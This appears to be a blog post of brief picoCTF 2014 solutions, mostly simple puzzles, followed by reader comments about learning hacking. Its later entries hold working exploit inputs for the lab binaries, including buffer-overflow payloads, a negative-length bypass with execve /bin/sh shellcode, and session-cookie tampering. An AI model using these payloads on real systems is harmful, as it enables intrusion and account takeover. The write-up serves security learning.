반응형

Hello! Today I'm going to write simple writeups(without reasonings) to wrap-up what I've solved in the picoctf2014. Please feel free to ask questions for specific problems/reasonings in the comments. Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

Chrome right click, click inspect element;

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and put in for keyword, 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Plug in a few cve's; CVE-2014-1542


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript

click break code! after entering the message.


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, go to inspect elements, open tab on the gridded bit of the website         -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to google images and paste the image's url, hit enter. The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
0x52657663 & 0x30646521 in little endian-" \x63\x76\x65\x52 & \x21\x65\x64\x30". Plug the values into 'data preview' below; \x63\x76\x65\x52\x21\x65\x64\x30; You get the values in ASCII. cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symbolic link the txt file into cow file.


pico19855@shell:~$ cd /home/daedalus

pico19855@shell:/home/daedalus$ ls

flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c

pico19855@shell:/home/daedalus$ ./supercow secret1.cow

 ____________

< cow_text_1 >

 ------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||

pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow

pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow

 ______________

< I_LOV_BNANAS >

 --------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.

Grep it.


pico19855@shell:/home/daedalus$ cd /problems/grepfriend

pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *

daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6

pico19855@shell:/problems/grepfriend$ 



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

alert(key); on your javascript console. (The key differs.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If an integer overflows, it becomes negative.


pico19855@shell:~$ nc vuln2014.picoctf.com 50000

Your number is 1712058. Can you make it negative by adding a positive integer?

2145771590

Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!


Thanks for playing.



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>


unsigned secret = 0xdeadbeef;


int main(int argc, char **argv){

    unsigned *ptr;

    unsigned value;


    char key[33];

    FILE *f;


    printf("Welcome! I will grant you one arbitrary write!\n");

    printf("Where do you want to write to? ");

    scanf("%p", &ptr);

    printf("Okay! What do you want to write there? ");

    scanf("%p", (void **)&value);


    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);

    *ptr = value;

    printf("Value written!\n");


    if (secret == 0x1337beef){

        printf("Woah! You changed my secret!\n");

        printf("I guess this means you get a flag now...\n");


        f = fopen("flag.txt", "r");

        fgets(key, 32, f);

        fclose(f);

        puts(key);


        exit(0);

    }


    printf("My secret is still safe! Sorry.\n");

}

pico19855@shell:/home/write_right$ gdb -q write_right

Reading symbols from write_right...(no debugging symbols found)...done.

(gdb) disas main

Dump of assembler code for function main:

   0x080485cd <+0>: push   %ebp

<cont..>

   0x0804865b <+142>: movl   $0x8048831,(%esp)

   0x08048662 <+149>: call   0x8048470 <puts@plt>

   0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.

   0x0804866c <+159>: cmp    $0x1337beef,%eax

<cont...>

   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>

   0x08048701 <+308>: leave  

   0x08048702 <+309>: ret    

End of assembler dump.

(gdb) x/wx 0x804a03c

0x804a03c <secret>: 0xdeadbeef

(gdb) q

pico19855@shell:/home/write_right$ ./write_right 

Welcome! I will grant you one arbitrary write!

Where do you want to write to? 0x804a03c

Okay! What do you want to write there? 1337beef

Writing 0x1337beef to 0x804a03c...

Value written!

Woah! You changed my secret!

I guess this means you get a flag now...

arbitrary_write_is_always_right

pico19855@shell:/home/write_right$ 



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
void give_shell(){
 gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh -i"); 
}

void vuln(char *input){
char buf[16];
int secret = 0;
strcpy(buf, input);

if (secret == 0xc0deface){
give_shell(); 
}else{
printf("The secret is %x\n", secret); 
}
 

int main(int argc, char **argv){
if (argc > 1)
vuln(argv[1]);
return 0;
}

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl
-e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
You see the url of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python

import sys """ Daedalus Corporation encryption script. """ def xor(input_data, key): result = "" for ch in input_data: result += chr(ord(ch) ^ key) return result def encrypt(input_data, password): key = 0 for ch in password: key ^= ((2 * ord(ch) + 3) & 0xff) return xor(input_data, key) def decrypt(input_data, password): return encrypt(input_data, password) def usage(): print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0]) exit() def main(): if len(sys.argv) < 5: usage() input_data = open(sys.argv[2], 'r').read() result_data = "" if sys.argv[1] == "encrypt": result_data = encrypt(input_data, sys.argv[4]) elif sys.argv[1] == "decrypt": result_data = decrypt(input_data, sys.argv[4]) else: usage() out_file = open(sys.argv[3], 'w') out_file.write(result_data) out_file.close()  

main()

//Actually, I kinda got mixed here, so (i dont remember his name) thanks to the anonymous admin who made this prob. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'


password=[]


def xor(input_data, key):

    result = ""

    for ch in input_data:

        result += chr(ord(ch) ^ key)

    return result


for password in range (0,256):

   result=xor(input_data, password)

   print result + "\n"


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why at&t
I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt
# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm

# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.

MOV $3187,%ebx //ebx=3187 MOV $26953,%eax //eax=26953 MOV $19902,%ecx //ecx=19902 CMP %eax,%ebx //compare eax and ebx JL L1 //Jump to L1 if ebx < eax JMP L2 //else jump to L2

L1: IMUL %eax,%ebx //ebx=eax*ebx, ebx=8539211 ADD %eax,%ebx //ebx+=eax, ebx=85926164 MOV %ebx,%eax //eax=ebx, eax=85926164 SUB %ecx,%eax //eax-=ecx, goto L3, eax=85906262 JMP L3

L2: IMUL %eax,%ebx //ebx=eax*ebx SUB %eax,%ebx //ebx+=eax MOV %ebx,%eax //eax=ebx ADD %ecx,%eax //eax-=ecx

L3: 

NOP



Delicious! - 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension, EditThisCookie. In the cookie value <session_id> is your session stored. Change it to numbers 1~50 (50, I'd recommend,) and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symb
ols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <gi
ve_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl
-e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great             




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memories of solving this (I remember asking about it tho,) I think I had used a more "professional" way when I first solved it but since the password is hardcoded(the hint) I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
______  
_ _ _____
| _ \ | | | | / __ \
| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \
| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) |
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/
| |
|_|
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at/home/no_overflow/ on the shell server. The source can be found here.

How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)


The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.

Don't forget to ulimit -c unlimit in order to make a core file.

pico19855@shell:~$ cat no_overflow.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256
void greet(int length){
char buf[BUFSIZE];
puts("What is your name?");
read(0, buf, length);
printf("Hello, %s\n!", buf);
}
void be_nice_to_people(){
gid_t gid = getegid();
setresgid(gid, gid, gid);
}
int main(int argc, char **argv){
int length;
be_nice_to_people();
puts("How long is your name?");
scanf("%d", &length);
if(length < BUFSIZE) //don't allow buffer overflow
greet(length);
else
puts("Length was too long!");
}

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                                                                    €莽咽œ昶苔ƒ嚆

 

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb) 

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734


0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a

(gdb) q


pico19855@shell:~$ cd /home/no_overflow

pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                       €莽擎|昶苔ƒ嚆

ls

Makefile  core flag.txt  no_overflow  no_overflow.c

cat flag.txt

what_is_your_sign


반응형

'CTF > picoCTF' 카테고리의 다른 글

picoCTF 2018 writeup  (1) 2019.02.05
picoCTF 2014  (6) 2014.11.19
picoCTF 2013  (0) 2014.06.27
  1. BlogIcon EverTokki 2014.11.25 05:34 신고

    Shellcode from: http://shell-storm.org/shellcode/files/shellcode-827.php

  2. dkdkdkdkdkdkdbdbddkdbdb 2015.11.01 09:34

    해킹공부하려면 뭐 먼저 시작해야되나요?

    • BlogIcon EverTokki 2015.11.01 13:56 신고

      c언어를 읽는 방법은 알아야 한다고 생각합니다.
      http://itguru.tistory.com/187 저는 여기 있는 씹어먹는 c언어로 시작했습니다. 그리고 해커스쿨에 찾아보면 다른 강좌들도 많을거에요.

  3. dkdkdkddkdkdkdkkdkdkd 2015.11.08 18:49

    알고리즘같은 프로그래밍에 대해서 먼저 배우라는 말도 들었는데 어떻게 생각하세요?

    • BlogIcon 에버토끼 2015.11.08 19:32

      어떻게 생각하느냐고에 대해 답변을 하자면 사실 배우는 사람 마음이라고 생각합니다. 거기에 흥미가 가시면 알고리즘부터 배우셔도 되고요.

  4. dkdkdkkdkdkdkdk 2015.11.18 11:02

    감사합니다. ㅎㅎㅎ

+ Recent posts